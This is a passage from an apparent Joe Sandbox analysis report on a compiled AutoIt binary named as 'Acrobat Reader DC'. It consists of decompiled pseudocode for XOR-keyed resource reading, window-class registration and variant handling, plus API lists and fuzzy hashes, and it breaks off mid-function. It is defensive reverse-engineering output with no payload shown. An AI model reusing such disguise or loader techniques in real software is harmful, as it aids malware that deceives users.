                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 88%
                                  			E004528BD(void* __eflags, signed int _a4, char _a8, intOrPtr* _a12, signed int* _a16, char _a19) {
				char _v8;
				signed int _v12;
				short _v32;
				short _v582;
				short _v1104;
				short _v1108;
				short _v1112;
				short _v1116;
				short _v1120;
				short _v1124;
				short _v1128;
				short _v1132;
				short _v1136;
				char _v1140;
				char _v1668;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t56;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int* _t86;
				intOrPtr _t87;
				void* _t110;
				intOrPtr* _t113;

				_t86 = _a16;
				_t113 = _a4;
				_push(0);
				_v1140 = 0;
				_v1136 = 0;
				_v1132 = 0;
				_v1128 = 0;
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v32 = 0;
				_v1104 = 0;
				_push( *((intOrPtr*)(_t113 + 4)));
				_push( *_t113);
				_v582 = 0;
				_v8 = 1;
				E004150D1(_t86, 0, _t110, _t113, __eflags); // executed
				_t56 = E00452719(__eflags, _t113, _a8,  &_v1668); // executed
				if(_t56 == 0) {
					E00414D04( &_a19, 1, 1,  *_t113);
					E00414D04( &_a4, 4, 1,  *_t113);
					_t112 = _a4 ^ 0x000087bc;
					E00414D04( &_a4, 4, 1,  *_t113);
					 *_t86 = _a4 ^ 0x000087bc;
					E00414D04( &_a4, 4, 1,  *_t113);
					_push(1);
					_push(0x10);
					_push( *_t113);
					_v12 = _a4 ^ 0x0000a685;
					E004150D1(_t86,  *_t113, _a4 ^ 0x000087bc, _t113, __eflags); // executed
					_t67 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113,  *_t86); // executed
					_a8 = _t67;
					_t68 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113, _t112); // executed
					_t87 = _t68;
					E00414D04(_t87, _t112, 1,  *_t113); // executed
					E0044AFEF( *((intOrPtr*)(_t113 + 8)) + 0x2477, __eflags, _t87, _t112,  *((intOrPtr*)(_t113 + 8)) + 0x2477);
					E00432229( &_v8, _t87, _t112);
					__eflags = _v12 - _v8;
					if(_v12 == _v8) {
						__eflags = _a19 - 1;
						if(_a19 != 1) {
							E00413748(_a8);
							_a8 = _t87;
						} else {
							_v1132 = 0;
							_v1128 = 0;
							_v1124 = 0;
							_v1112 = 0;
							_v1108 = 0;
							_v32 = 0;
							_v1120 = 1;
							_v1116 = 1;
							_v1104 = 0;
							_v582 = 0;
							_v1136 = _t87;
							_v1140 = _a8;
							E0044B1A9(_a8, _t112,  &_v1140); // executed
							E00413748(_t87); // executed
						}
						 *_a12 = _a8;
						__eflags = 0;
						return 0;
					} else {
						E00413748(_a8);
						E00413748(_t87);
						return 0xa;
					}
				} else {
					return 6;
				}
			}





























                                  0x004528c9
                                  0x004528cd
                                  0x004528d1
                                  0x004528d4
                                  0x004528da
                                  0x004528e0
                                  0x004528e6
                                  0x004528ec
                                  0x004528f2
                                  0x004528f8
                                  0x004528fe
                                  0x00452904
                                  0x0045290a
                                  0x00452910
                                  0x00452919
                                  0x0045291c
                                  0x0045291d
                                  0x00452924
                                  0x0045292b
                                  0x0045293f
                                  0x00452946
                                  0x00452961
                                  0x00452971
                                  0x00452984
                                  0x0045298a
                                  0x004529a3
                                  0x004529a5
                                  0x004529b2
                                  0x004529b9
                                  0x004529bb
                                  0x004529bc
                                  0x004529bf
                                  0x004529ca
                                  0x004529d3
                                  0x004529d6
                                  0x004529de
                                  0x004529e7
                                  0x004529fb
                                  0x00452a06
                                  0x00452a0e
                                  0x00452a11
                                  0x00452a36
                                  0x00452a3a
                                  0x00452aa9
                                  0x00452aae
                                  0x00452a3c
                                  0x00452a3e
                                  0x00452a44
                                  0x00452a4a
                                  0x00452a50
                                  0x00452a56
                                  0x00452a5c
                                  0x00452a66
                                  0x00452a6c
                                  0x00452a72
                                  0x00452a85
                                  0x00452a8c
                                  0x00452a92
                                  0x00452a98
                                  0x00452a9e
                                  0x00452a9e
                                  0x00452abc
                                  0x00452abe
                                  0x00452ac4
                                  0x00452a13
                                  0x00452a17
                                  0x00452a20
                                  0x00452a33
                                  0x00452a33
                                  0x00452948
                                  0x00452953
                                  0x00452953

                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00410390() {
				struct _WNDCLASSEXW _v52;
				struct HICON__* _t18;
				struct HICON__* _t19;
				intOrPtr _t21;
				void* _t22;
				short _t23;
				void* _t24;
				void* _t25;
				struct HICON__* _t26;
				struct HICON__* _t28;
				struct HICON__* _t29;
				struct HBRUSH__* _t34;
				int _t36;

				_t34 = GetSysColorBrush(0xf);
				_t26 = LoadCursorW(0, 0x7f00);
				_t18 = LoadIconW( *0x497520, 0x63); // executed
				 *0x4a7f40 = _t18; // executed
				_t19 = LoadIconW( *0x497520, 0xa4); // executed
				 *0x4a7f48 = _t19;
				 *0x4a7f4c = LoadIconW( *0x497520, 0xa2);
				_t21 =  *0x4a9604; // 0xa72e98
				if( *((char*)(_t21 + 0x1f)) == 0) {
					_t22 = E0044395E(4);
					_t36 = 0;
				} else {
					_t36 = 0;
					_t22 = LoadImageW( *0x497520, 0x63, 1, 0x10, 0x10, 0);
				}
				_t28 =  *0x4a7f40; // 0x1c0087
				_v52.hInstance =  *0x497520;
				 *0x4a7f44 = _t22;
				_v52.cbSize = 0x30;
				_v52.style = 0x23;
				_v52.cbClsExtra = _t36;
				_v52.cbWndExtra = _t36;
				_v52.hCursor = _t26;
				_v52.hbrBackground = _t34;
				_v52.lpszMenuName = _t36;
				_v52.lpszClassName = L"AutoIt v3";
				_v52.hIcon = _t28;
				_v52.hIconSm = _t22;
				_v52.lpfnWndProc = E004010E0;
				_t23 = RegisterClassExW( &_v52);
				_t29 =  *0x4a7f40; // 0x1c0087
				 *0x4974e4 = _t23;
				_t24 =  *0x4a7f44; // 0xf045b
				_t25 = E00410490(_t29, _t24); // executed
				return _t25;
			}
















                                  0x004103a8
                                  0x004103b6
                                  0x004103c0
                                  0x004103ce
                                  0x004103d3
                                  0x004103e1
                                  0x004103e8
                                  0x004103ed
                                  0x004103f6
                                  0x00428363
                                  0x0042836b
                                  0x004103fc
                                  0x00410402
                                  0x0041040e
                                  0x0041040e
                                  0x0041041a
                                  0x00410420
                                  0x00410427
                                  0x0041042c
                                  0x00410433
                                  0x0041043a
                                  0x0041043d
                                  0x00410440
                                  0x00410443
                                  0x00410446
                                  0x00410449
                                  0x00410450
                                  0x00410453
                                  0x00410456
                                  0x0041045d
                                  0x00410463
                                  0x00410469
                                  0x0041046f
                                  0x00410476
                                  0x00410481

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32 ref: 0041040E
                                  • RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32 ref: 004104ED
                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AAF920,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410490 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00410490(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct _WNDCLASSEXW _v60;
				struct HINSTANCE__* _t19;
				void* _t25;
				void* _t26;
				int _t27;
				struct HINSTANCE__* _t29;
				void* _t31;

				_t19 =  *0x497520;
				 *0x4a8684 = _t19;
				_v60.cbSize = 0x30;
				_v60.style = 0x2b;
				_v60.cbClsExtra = 0;
				_v60.cbWndExtra = 0x1e;
				_v60.hInstance = _t19;
				_v60.hCursor = 0;
				_v60.hbrBackground = GetSysColorBrush(0xf);
				_v60.lpszMenuName = 0;
				_v60.hIconSm = _a8;
				_v60.hIcon = _a4;
				_v60.lpszClassName = L"AutoIt v3 GUI";
				_v60.lpfnWndProc = 0x47f08f;
				 *0x4974e0 = RegisterClassExW( &_v60);
				 *0x4a8688 = RegisterWindowMessageW(L"TaskbarCreated");
				_v12 = 8;
				_v8 = 0x13b;
				__imp__InitCommonControlsEx( &_v12);
				_t25 = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
				_t29 =  *0x4a8684; // 0x400000
				 *0x4a86dc = _t25;
				_t26 = LoadIconW(_t29, 0xa9);
				_t31 =  *0x4a86dc; // 0xaaf920
				_t27 = ImageList_ReplaceIcon(_t31, 0xffffffff, _t26); // executed
				 *0x4a86e0 = 0;
				return _t27;
			}












                                  0x00410496
                                  0x004104a0
                                  0x004104a5
                                  0x004104ac
                                  0x004104b3
                                  0x004104b6
                                  0x004104bd
                                  0x004104c0
                                  0x004104cc
                                  0x004104d6
                                  0x004104d9
                                  0x004104dc
                                  0x004104df
                                  0x004104e6
                                  0x004104f8
                                  0x00410504
                                  0x0041050d
                                  0x00410514
                                  0x0041051b
                                  0x0041052b
                                  0x00410531
                                  0x0041053d
                                  0x00410542
                                  0x00410548
                                  0x00410552
                                  0x00410558
                                  0x00410562

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32 ref: 004104ED
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • ImageList_ReplaceIcon.COMCTL32(00AAF920,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$TaskbarCreated
                                  • API String ID: 2914291525-888179712
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0040A780(void __ecx, void* __fp0, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				char _v28;
				void _v32;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				void _v72;
				char _v76;
				void _v80;
				char _v84;
				char _v85;
				void* _v92;
				char _v95;
				short _v96;
				void _v100;
				void* _v104;
				void* _v108;
				void _v112;
				char _v115;
				short _v116;
				char _v119;
				void* _v120;
				void* _v124;
				void* _v128;
				void _v136;
				void* _v140;
				char _v148;
				void* _v152;
				void* _v156;
				void _v160;
				void __ebx;
				void* __edi;
				void* __esi;
				void* _t371;
				intOrPtr _t380;
				void* _t381;
				void* _t382;
				void** _t384;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t390;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				signed int _t414;
				void* _t422;
				void** _t427;
				void* _t428;
				void* _t430;
				void* _t431;
				void* _t438;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;
				signed int _t452;
				void* _t459;
				void _t490;
				short _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				void** _t495;
				void* _t496;
				void* _t499;
				void* _t501;
				void** _t502;
				void* _t503;
				signed int _t508;
				void** _t517;
				void* _t521;
				void* _t525;
				void* _t531;
				void* _t534;
				void* _t546;
				void _t547;
				void* _t551;
				void _t554;
				signed int* _t559;
				void* _t563;
				signed int _t572;
				void* _t574;
				void* _t575;
				void* _t594;

				_t594 = __fp0;
				_t574 = (_t572 & 0xfffffff8) - 0x84;
				_v112 = __ecx;
				_t580 =  *0x4a9600 & 0x00000001;
				if(( *0x4a9600 & 0x00000001) == 0) {
					 *0x4a9600 =  *0x4a9600 | 0x00000001;
					 *0x4a95f0 = 0;
					 *0x4a95f8 = 1;
					 *0x4a95fc = 0;
					E0041130A(__eflags, 0x425c21);
					_t574 = _t574 + 4;
				}
				_t563 = _a12;
				_push(8);
				_v96 = 1;
				_v128 = _t563;
				_v124 = 0;
				_v120 = 0;
				_v116 = 1;
				_t371 = E004115D7(0, _t563, _t580);
				_t575 = _t574 + 4;
				if(_t371 == 0) {
					_t371 = 0;
				} else {
					 *_t371 = 0x14;
				}
				 *((intOrPtr*)(_t371 + 4)) = 0;
				_t559 = _a8;
				_v100 = _t371;
				_v104 = 1;
				_v108 = 0x17;
				_v92 = ( *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4))[2];
				while(1) {
					L4:
					_t508 =  *_t559;
					if(_t508 == _a16) {
						goto L9;
					}
					L5:
					_t380 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + _t508 * 4));
					if( *((short*)(_t380 + 8)) == 0x7f) {
						goto L9;
					}
					_t491 =  *((short*)(_t380 + 8));
					if(_t491 == 0x36) {
						_t492 = _v124;
						_v108 = 0x16;
						__eflags = _t492;
						if(_t492 != 0) {
							__eflags = _v115;
							if(__eflags == 0) {
								_push(0x18);
								_t381 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t381;
								if(_t381 == 0) {
									_t382 = 0;
								} else {
									_v136 = _t381;
									_t496 = _v136;
									E0040B960(0x4a95f0, _t496, _t508, _t559);
									_t382 = _t496;
									_t492 = _v124;
								}
								 *((intOrPtr*)(_t382 + 0x10)) = _v120;
								_v120 = _t382;
							} else {
								E00408E80(_v120, _t508, 0x4a95f0);
								_t492 = _v128;
								_v119 = 0;
							}
							L31:
							_t384 =  *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4);
							_t493 = _t492 + 1;
							_v124 = _t493;
							__eflags = _t493 - 1;
							if(_t493 != 1) {
								__eflags = _v115;
								_t543 = _v120;
								if(_v115 != 0) {
									_v136 =  *((intOrPtr*)(_t543 + 0x10));
								} else {
									_v136 = _t543;
								}
							} else {
								_v136 = _t563;
							}
							_t517 = _v136;
							_t494 =  *_t384;
							_t385 = _t517[3];
							__eflags = _t385;
							if(_t385 != 0) {
								E004431AD(_t385);
								_t517 = _v140;
								_t517[3] = 0;
							}
							_t387 = _t517[2];
							__eflags = _t387 - 8;
							if(_t387 == 8) {
								_t543 =  *_t517;
								__eflags = _t543;
								if(_t543 == 0) {
									goto L35;
								}
								__imp__#9(_t543);
								_t543 =  *_v140;
								_push( *_v140);
								E004111DC();
								_t575 = _t575 + 4;
								goto L39;
							} else {
								L35:
								__eflags = _t387 - 0xa;
								if(_t387 == 0xa) {
									_t518 =  *_t517;
									__eflags =  *_t517;
									if(__eflags != 0) {
										E0044318E(_t518);
									}
								} else {
									__eflags = _t387 - 5;
									if(_t387 == 5) {
										E0040E270(_v136, _t563);
									} else {
										__eflags = _t387 - 0xb;
										if(_t387 == 0xb) {
											_t521 =  *_v136;
											_t543 =  *(_t521 + 4);
											_push( *(_t521 + 4));
											E004111DC();
											_push( *_v136);
											E004111DC();
											_t575 = _t575 + 8;
										} else {
											__eflags = _t387 - 0xc;
											if(__eflags == 0) {
												_t523 =  *_t517;
												__eflags =  *_t517;
												if(__eflags != 0) {
													E0044B3D9(_t523);
												}
											}
										}
									}
								}
								L39:
								_t388 = _v136;
								_push(0x10);
								 *_t388 = 0;
								 *(_t388 + 8) = 4;
								_t389 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t389;
								if(_t389 == 0) {
									_t389 = 0;
								} else {
									 *_t389 =  *_t494;
									 *((intOrPtr*)(_t389 + 4)) =  *((intOrPtr*)(_t494 + 4));
									_t543 =  *(_t494 + 8);
									 *(_t389 + 8) =  *(_t494 + 8);
									_t495 =  *(_t494 + 0xc);
									 *(_t389 + 0xc) = _t495;
									 *_t495 =  *_t495 + 1;
									__eflags =  *_t495;
								}
								 *(_v136 + 0xc) = _t389;
								_t390 = _v112;
								 *_t559 = 1 +  *_t559;
								__eflags =  *((char*)(_t390 + 0xfd));
								if( *((char*)(_t390 + 0xfd)) != 0) {
									E00457F66(_t543, __eflags, _t594, E0040D0B0( &_v128));
									_t390 = _v116;
								}
								__eflags =  *((char*)(_t390 + 0xfe));
								if( *((char*)(_t390 + 0xfe)) != 0) {
									E00472F47(_v112, __eflags, _t594, _v112, E0040D0B0( &_v128));
								}
								while(1) {
									L4:
									_t508 =  *_t559;
									if(_t508 == _a16) {
										goto L9;
									}
									goto L5;
								}
							}
						}
						__eflags = _t563 - 0x4a95f0;
						if(_t563 == 0x4a95f0) {
							goto L31;
						}
						_t409 =  *(_t563 + 0xc);
						__eflags = _t409;
						if(_t409 != 0) {
							E004431AD(_t409);
							 *(_t563 + 0xc) = 0;
						}
						_t411 =  *(_t563 + 8);
						__eflags = _t411 - 8;
						if(_t411 == 8) {
							_t525 =  *_t563;
							__eflags = _t525;
							if(_t525 == 0) {
								goto L25;
							}
							__imp__#9(_t525);
							_push( *_t563);
							E004111DC();
							_t575 = _t575 + 4;
							goto L29;
						} else {
							L25:
							__eflags = _t411 - 0xa;
							if(_t411 == 0xa) {
								_t412 =  *_t563;
								__eflags = _t412;
								if(_t412 != 0) {
									E0044318E(_t412);
								}
							} else {
								__eflags = _t411 - 5;
								if(_t411 == 5) {
									E0040E270(_t563, _t563);
								} else {
									__eflags = _t411 - 0xb;
									if(_t411 == 0xb) {
										_push( *((intOrPtr*)( *_t563 + 4)));
										E004111DC();
										_push( *_t563);
										E004111DC();
										_t575 = _t575 + 8;
									} else {
										__eflags = _t411 - 0xc;
										if(_t411 == 0xc) {
											_t422 =  *_t563;
											__eflags = _t422;
											if(_t422 != 0) {
												E0044B3D9(_t422);
											}
										}
									}
								}
							}
							L29:
							 *(_t563 + 8) = 1;
							 *_t563 = 0;
							_t546 =  *0x4a95f8; // 0x1
							 *(_t563 + 8) = _t546;
							_t413 =  *0x4a95f8; // 0x1
							__eflags = _t413 - 1;
							if(_t413 != 1) {
								_t414 = _t413 - 1;
								__eflags = _t414 - 0xb;
								if(__eflags > 0) {
									goto L31;
								}
								switch( *((intOrPtr*)(_t414 * 4 +  &M0042BCDE))) {
									case 0:
										goto L30;
									case 1:
										 *_t563 =  *0x4a95f0;
										 *((intOrPtr*)(_t563 + 4)) =  *0x4a95f4;
										goto L31;
									case 2:
										__fp0 =  *0x4a95f0;
										 *__esi = __fp0;
										goto L31;
									case 3:
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											 *(__esi + 0xc) = 0;
										} else {
											__ecx =  *0x4a95fc;
											__edx =  *__ecx;
											 *__eax =  *__ecx;
											__edx =  *(__ecx + 4);
											 *(__eax + 4) =  *(__ecx + 4);
											__edx =  *(__ecx + 8);
											 *(__eax + 8) = __edx;
											__ecx =  *(__ecx + 0xc);
											 *(__eax + 0xc) = __ecx;
											 *__ecx = 1 +  *__ecx;
											 *(__esi + 0xc) = __eax;
										}
										goto L31;
									case 4:
										_push(0x214);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											__eflags = 0;
										} else {
											__esi =  *0x4a95f0;
											__ebx = _v124;
											__ecx = 0x85;
											__edi = __eax;
											__eax = memcpy(__eax, __esi, 0x85 << 2);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__esi = _v128;
											__edi = _a8;
										}
										 *__esi = __eax;
										__eflags =  *(__eax + 4);
										if( *(__eax + 4) != 0) {
											__eax =  *(__eax + 4);
											 *__eax = 1 +  *__eax;
										}
										goto L31;
									case 5:
										__eax =  *0x4a95f0;
										 *__esi = __eax;
										goto L31;
									case 6:
										__ecx =  *0x4a95f0;
										 *__esi =  *0x4a95f0;
										goto L31;
									case 7:
										__eflags =  *0x4a95f0;
										if(__eflags != 0) {
											_push(0x10);
											__eax = E004115D7(__edi, __esi, __eflags);
											__esp = __esp + 4;
											_push(__eax);
											 *__esi = __eax;
											__imp__#8();
											__edx =  *0x4a95f0;
											__eax =  *__esi;
											_push(__edx);
											_push(__eax);
											__imp__#10();
											__eflags = __eax;
											if(__eax < 0) {
												__ecx =  *__esi;
												_push( *__esi);
												__imp__#9();
												__edx =  *__esi;
												_push(__edx);
												__eax = E004111DC();
												__esp = __esp + 4;
												 *__esi = 0;
											}
										}
										goto L31;
									case 8:
										__al =  *0x4a95f0;
										 *__esi = __al;
										goto L31;
									case 9:
										_push(0x18);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											goto L255;
										}
										__ecx =  *0x4a95f0;
										__eax = E0044B8A3(__eax,  *0x4a95f0);
										 *__esi = __eax;
										goto L31;
									case 0xa:
										_push(8);
										__eax = E004115D7(__edi, __esi, __eflags);
										 *__esi = __eax;
										__edx =  *0x4a95f0;
										__ecx =  *( *0x4a95f0);
										 *__eax =  *( *0x4a95f0);
										__edx =  *__esi;
										__eax =  *( *__esi);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eflags == 0) {
											_push(1);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__edx =  *__esi;
											__eax =  *(__edx + 4);
											__esp = __esp + 4;
											 *__eax = 0;
										} else {
											_push(__eax);
